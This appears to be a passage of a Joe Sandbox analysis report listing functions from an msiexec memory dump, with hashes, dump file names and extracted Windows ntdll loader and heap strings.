Instruction ID: bb9055b5308a0350474e767323ce0242d31d830516bc51f68ec6438953b0f08f
Opcode Fuzzy Hash: bb006a9c60d9ff98e3a2dd938402cd7a2b2dd3c4437be976396d8f2fba1d3691
Instruction Fuzzy Hash: DF6103322057809FE712CB28CC45F5777E8FF84B54F150469EA9ACB292D734E901CB62

Function 243C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

TG7$, xrefs: 243C2462
minkernel\ntdll\ldrinit.c, xrefs: 2440A9A2
LdrpDynamicShimModule, xrefs: 2440A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2440A992

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG7$$minkernel\ntdll\ldrinit.c
API String ID: 0-4208975623
Opcode ID: 1e72d34941072d28c77678c5685096473f082456639d1844533c3fd5d24e9d80
Instruction ID: 467ce4886e8f08c6741dc4a8b63a06a6205d11b0c7b8c4df8dca4247a9a88e50
Opcode Fuzzy Hash: 1e72d34941072d28c77678c5685096473f082456639d1844533c3fd5d24e9d80
Instruction Fuzzy Hash: 78312A72A40201EBEB15DF99C984E5AB7B4FBA4B04F25806AF900BB355CFB45D52DB80

Function 24399148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualProtect Failed 0x%p %x, xrefs: 243FBABA
VirtualQuery Failed 0x%p %x, xrefs: 243FBAF7
HEAP: , xrefs: 243FBAAD, 243FBAEA
HEAP[%wZ]: , xrefs: 243FBAA0, 243FBADD

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 22c86ebbf362b2047b3b9f602f8a74b5aade9b29195498f92bb8ee83acca98e9
Instruction ID: e964d47d09348d2b25fcaf0f99970ae83959938eb568694607e4a612f715203c
Opcode Fuzzy Hash: 22c86ebbf362b2047b3b9f602f8a74b5aade9b29195498f92bb8ee83acca98e9
Instruction Fuzzy Hash: 06318C72A10114EFDB01CB5ACC84FDABBF8FF45B70F1540A6E924AB295E774E940CA60

Function 243E1270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 243E12A5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 243E127B
BuildLabEx, xrefs: 243E130F
E=$, xrefs: 243E1310, 243E1320, 243E1313, 243E1325

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$E=$$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-722450940
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 7d2bfed91e5ca8afa539b27a02393d2ed8adb2991ca0dd453c29c0e01d75733d
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: BF319E72A01529AFEF16DF95CC40EEEBBBDEF94750F004065EA18A7260E730DA05DB50

Function 244494E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

, xrefs: 24449B84
0, xrefs: 24449BF6
, xrefs: 24449AD7

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: 4a75166b042836d7e19a4e029d8b6f803270de92b71646f1e42d75d1921ff95f
Instruction ID: 5dd90b8cee4f4f87cdbd9c716b4e135bfc54f798e3d278fa3b8609285cb1e379
Opcode Fuzzy Hash: 4a75166b042836d7e19a4e029d8b6f803270de92b71646f1e42d75d1921ff95f
Instruction Fuzzy Hash: 463222B1A083818FE760CF68C884B5BBBE5BF88344F00492EF59987351D775E949DB52

Function 243B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 244050CA
HEAP: , xrefs: 244050BD
HEAP[%wZ]: , xrefs: 244050AE

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: f4650759fa5f8d5406a7806c80a9867fc0d3a31822777b60bef8faa609b7b14d
Instruction ID: 9c85b6d62ccb3675e3247a69dccac6aafe400fafdb1bc987e113b41d21342d8e
Opcode Fuzzy Hash: f4650759fa5f8d5406a7806c80a9867fc0d3a31822777b60bef8faa609b7b14d
Instruction Fuzzy Hash: 15F18730B00605DFEB19CF68C890F6ABBB5FF44704F1081A9E5969B796D734AA81CF90

Function 243A1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 243A1728
HEAP: , xrefs: 243A1596
HEAP[%wZ]: , xrefs: 243A1712

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 70c3c003748cf690bd03ef75b3b53a21e7f499938f35ad0bd9526b852903e0a4
Instruction ID: 0a92ea9ead9e87008da0bef0e5fef736fcb3a9743163600e3c6b17619df2e11e
Opcode Fuzzy Hash: 70c3c003748cf690bd03ef75b3b53a21e7f499938f35ad0bd9526b852903e0a4
Instruction Fuzzy Hash: C1E1E330A04A559FDB1ACF68C491B7ABBF5EF48300F14849EE9D6CB246D734E944CB50

Function 2442368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 24423842
DelegatedNtdll, xrefs: 244236CE
@, xrefs: 2442389F

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: 375d4c52d52904da139eccba32711c1de3a2a589994d7bcec3b9141264d21fe4
Instruction ID: 2b878e9fc699b9aed7fd22b4025b413c018c11ad6945640439c49ceb39f8107d
Opcode Fuzzy Hash: 375d4c52d52904da139eccba32711c1de3a2a589994d7bcec3b9141264d21fe4
Instruction Fuzzy Hash: DBB18E71605B55AFEB11CF64C880F5BB7F8FF54758F004929FA54AB290DBB4E8048B92

Function 2439A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 243FC1E4
UseFilter, xrefs: 2439A1C1
FilterFullPath, xrefs: 243FC2E6

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 457e8b0c229e7c230aafb06462e3e8f98845f635c220a5b920113d183b67e4e1
Instruction ID: 6d438cab85a99d0cfec942e65ec897ca514acefa6416537ad0558774ab979d89
Opcode Fuzzy Hash: 457e8b0c229e7c230aafb06462e3e8f98845f635c220a5b920113d183b67e4e1
Instruction Fuzzy Hash: F0A17C729416299BDB32DF64CC98BEAB7B8FF44710F1101EAE908A7250D7359E84CF50

Function 243D909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 243D9148
%, xrefs: 24415D3F
&, xrefs: 24415CF8

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 21df4d44dfd376647a66572166c4946c47a56ee697b85cc70d01e03add44d7c1
Instruction ID: e709b0ea613770c837645faf2e5a82052602c7e8195bc76cf6c62c6699d58971
Opcode Fuzzy Hash: 21df4d44dfd376647a66572166c4946c47a56ee697b85cc70d01e03add44d7c1
Instruction Fuzzy Hash: A271CD73608745DFDB05CF20C980A5BBBE9FF98718F108A1DE4AA97299D730D905CB92

Function 2447B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

TargetNtPath, xrefs: 2447B82F
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 2447B82A
GlobalizationUserSettings, xrefs: 2447B834

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: b915eda4b7927a7dfe894a46adfe37604bdcae80ed4d76d7542a8908149a773c
Instruction ID: a30f139b9d0aa3e4d15c1bd2d483863619f55f9718c49d8c9a6b1b88546b60db
Opcode Fuzzy Hash: b915eda4b7927a7dfe894a46adfe37604bdcae80ed4d76d7542a8908149a773c
Instruction Fuzzy Hash: D6617E72901268AFEB31DB54CC88BDABBB8AF18754F0101E5E918A7251DB74DE81CF90

Function 2439F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 243FE6C6
HEAP: , xrefs: 243FE6B3
HEAP[%wZ]: , xrefs: 243FE6A6

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: b85b94a8b8b81e931ffbae412f5797311e3939315da0a6e42dd1911fa31df286
Instruction ID: e60a7242731427d8f057e6e37c5e7e550d7d760569dfab36f08708b4dc3951ca
Opcode Fuzzy Hash: b85b94a8b8b81e931ffbae412f5797311e3939315da0a6e42dd1911fa31df286
Instruction Fuzzy Hash: 9F51F531704A84EFE712CBA8C995F9ABBF8FF05700F0404A5E696CB692D774EA40CB50

Function 243DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 244182E8
Failed to reallocate the system dirs string !, xrefs: 244182D7
LdrpInitializePerUserWindowsDirectory, xrefs: 244182DE

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 26061a613350b10e2c735abd43a51d43f21644ca4dbed10272f0280b0919bec5
Instruction ID: 2d3ac19d5ac7b0b48f80fb73bede4fa2646a611f74f206aa8da0088cc837b77d
Opcode Fuzzy Hash: 26061a613350b10e2c735abd43a51d43f21644ca4dbed10272f0280b0919bec5
Instruction Fuzzy Hash: C141C072515300EFEB11DB65C884B4BB7E8FF69A50F00492AF958A7295EF78D800DB91

Function 2439758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 243FAFCB
HEAP: , xrefs: 243FAFB8
HEAP[%wZ]: , xrefs: 243FAFAB

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: a6822e8bcb9fb5d5154b3547fe85b59beb970d2b46d5c17cca737ac727349494
Instruction ID: b57f8a61ee6076d7be636f9de451c1c5e3a9524f085e8bb8c6cd9c7ecee86b4f
Opcode Fuzzy Hash: a6822e8bcb9fb5d5154b3547fe85b59beb970d2b46d5c17cca737ac727349494
Instruction Fuzzy Hash: 2D411270300B80CFFB19EB1CC9D0BAA7BE0AF01254F1548A9D5868F2A6DB74D985CB61

Function 243D16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 24411B39
LdrpAllocateTls, xrefs: 24411B40
minkernel\ntdll\ldrtls.c, xrefs: 24411B4A

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: e52275b383106615765a2a290874e5e7354afbe04023cb556c2625f0f698ff3f
Instruction ID: cc7b40e09b01cb90429cfcab7c4828ac46bd6d842a861394a18ae1fdf81e92e3
Opcode Fuzzy Hash: e52275b383106615765a2a290874e5e7354afbe04023cb556c2625f0f698ff3f
Instruction Fuzzy Hash: 2C416A76A00615EFEB16CFA9C881BAEBBF5FF58704F10811AE505A7354DB75A900CB90

Function 2445C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 2445C212
@, xrefs: 2445C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2445C1C5

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 51b16699f63f3d63f99625e28345bacc15f0147b40a2892ef3fa7c49c87febc0
Instruction ID: 32e56853cb803b2e25e43dd1375dcb4292aa4528c5ed5f0a5e9797874ed49a95
Opcode Fuzzy Hash: 51b16699f63f3d63f99625e28345bacc15f0147b40a2892ef3fa7c49c87febc0
Instruction Fuzzy Hash: B5414C72E00219EBEF11CBD4D891FEEFBB8AF24754F10406AEA05B7294D7749B458B90

Function 24424755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 2442488F
minkernel\ntdll\ldrredirect.c, xrefs: 24424899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 24424888

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: a33fc930f8a6505574b1002db579b9fbcf756aea0a67ca3c6aa6c71917b0d6ef
Instruction ID: 49eb74065641ecc992349287c40d3451798baf1df2c22c03867c65c6c804e27f
Opcode Fuzzy Hash: a33fc930f8a6505574b1002db579b9fbcf756aea0a67ca3c6aa6c71917b0d6ef
Instruction Fuzzy Hash: 57419036A14E509BDF11CF68C840A167BE4FF89A50F4105AAED98E7355D730E900CB91

Function 2442B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 2442B632
GlobalFlag, xrefs: 2442B68F
@, xrefs: 2442B670

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 5689262198d096360f691a15afd99f0a0710e66a6a879e42cddc513e6b700db7
Instruction ID: 0e66c943f7f2aad5f182adff6636e83f0a01fba594a9358964155b8a52183e18
Opcode Fuzzy Hash: 5689262198d096360f691a15afd99f0a0710e66a6a879e42cddc513e6b700db7
Instruction Fuzzy Hash: 9C3159B1E00659AFEB00DFA5CC80AEEBBB9EF44744F000469E605A7244E7749F00CBA5

Function 243D1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

DLL "%wZ" has TLS information at %p, xrefs: 24411A40
minkernel\ntdll\ldrtls.c, xrefs: 24411A51
LdrpInitializeTls, xrefs: 24411A47

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 37e73a0c7eb8c069bb56c04e8dbf7ccbb1bd890433062be5943ad3bbef62f035
Instruction ID: 064b34ac639827515d9d379d12853bca69d4e22408b5791f102684f90c3d85bc
Opcode Fuzzy Hash: 37e73a0c7eb8c069bb56c04e8dbf7ccbb1bd890433062be5943ad3bbef62f035
Instruction Fuzzy Hash: 2531D473A10204EBFF128F58CC95F6A7AE9FF68754F15015AF905B7280DB74AE409790

Function 244220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 24422104
LdrpInitializationFailure, xrefs: 244220FA
Process initialization failed with status 0x%08lx, xrefs: 244220F3

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: ac889c0c72124ac1971df8e590a610b6f04d1efa18e06006075fb598da0f4e70
Instruction ID: ffb5e858309f9ed074df0ce9c77e2b2e62bafc3b189f951b6c9702ce381d18d3
Opcode Fuzzy Hash: ac889c0c72124ac1971df8e590a610b6f04d1efa18e06006075fb598da0f4e70
Instruction Fuzzy Hash: A4F0FC75500608BBFF10D749CC52FA577A8FB55F54F100059FB447B386DAF4A900CA91

Function 243B52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 243B55A3
@, xrefs: 243B5445

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: c87a6bd759a29a6c07d213b5fa79b2da005de14931a42d0247ac352acc7b40c4
Instruction ID: f7559340aa974aaf3ad215c8538fb2d706e76a2f33cf93b60b1a7aaf02a3c3ea
Opcode Fuzzy Hash: c87a6bd759a29a6c07d213b5fa79b2da005de14931a42d0247ac352acc7b40c4
Instruction Fuzzy Hash: 3732A0726083218FD714CF14C480B6EBBE5EF84B88F10992EFAC68B690E774D950CB52

Function 2446A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 2446A551
`, xrefs: 2446A44B

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 6369f1628310fb521d1ad3144491118c74337c2dcf0a673be790ae551b381506
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 40C112312047429BEB14CF24C841B1BBBE1BFD5758F044A2EFA96DA291D774D985CB41

Function 2441E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 2441E75A
UEFI, xrefs: 2441E751

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 7e6d7e7e81119c43c92a175c3449193b3d680e7f5cf0329e8b4fdf76cb7d4c8d
Instruction ID: d6e6555d370952740e56a544cbf230516cfa397fb387b5a966c57d318a60fb6e
